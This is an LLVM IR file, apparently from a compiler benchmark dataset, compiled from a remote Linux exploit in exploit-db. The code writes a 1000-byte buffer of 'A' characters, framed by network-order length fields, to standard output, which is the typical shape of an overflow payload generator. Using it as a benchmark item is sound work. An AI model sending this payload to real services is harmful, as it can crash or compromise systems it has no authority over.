; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_19947.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_19947.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i8**, align 8
  %5 = alloca [1000 x i8], align 16
  %6 = alloca i16, align 2
  %7 = alloca i8, align 1
  store i32 %0, i32* %3, align 4
  store i8** %1, i8*** %4, align 8
  %8 = getelementptr inbounds [1000 x i8], [1000 x i8]* %5, i64 0, i64 0
  %9 = call i32 @memset(i8* %8, i8 signext 65, i32 1000)
  %10 = call zeroext i16 @htons(i32 1)
  store i16 %10, i16* %6, align 2
  %11 = call i32 (i32, ...) @write(i32 1, i16* %6, i32 2)
  %12 = call zeroext i16 @htons(i32 4)
  store i16 %12, i16* %6, align 2
  %13 = call i32 (i32, ...) @write(i32 1, i16* %6, i32 2)
  %14 = call zeroext i16 @htons(i32 1005)
  store i16 %14, i16* %6, align 2
  %15 = call i32 (i32, ...) @write(i32 1, i16* %6, i32 2)
  %16 = call zeroext i16 @htons(i32 1000)
  store i16 %16, i16* %6, align 2
  %17 = call i32 (i32, ...) @write(i32 1, i16* %6, i32 2)
  %18 = getelementptr inbounds [1000 x i8], [1000 x i8]* %5, i64 0, i64 0
  %19 = call i32 (i32, ...) @write(i32 1, i8* %18, i64 1000)
  %20 = call zeroext i16 @htons(i32 0)
  store i16 %20, i16* %6, align 2
  %21 = call i32 (i32, ...) @write(i32 1, i16* %6, i32 2)
  store i8 0, i8* %7, align 1
  %22 = call i32 (i32, ...) @write(i32 1, i8* %7, i32 1)
  ret i32 0
}

declare dso_local i32 @memset(i8*, i8 signext, i32) #1

declare dso_local zeroext i16 @htons(i32) #1

declare dso_local i32 @write(i32, ...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
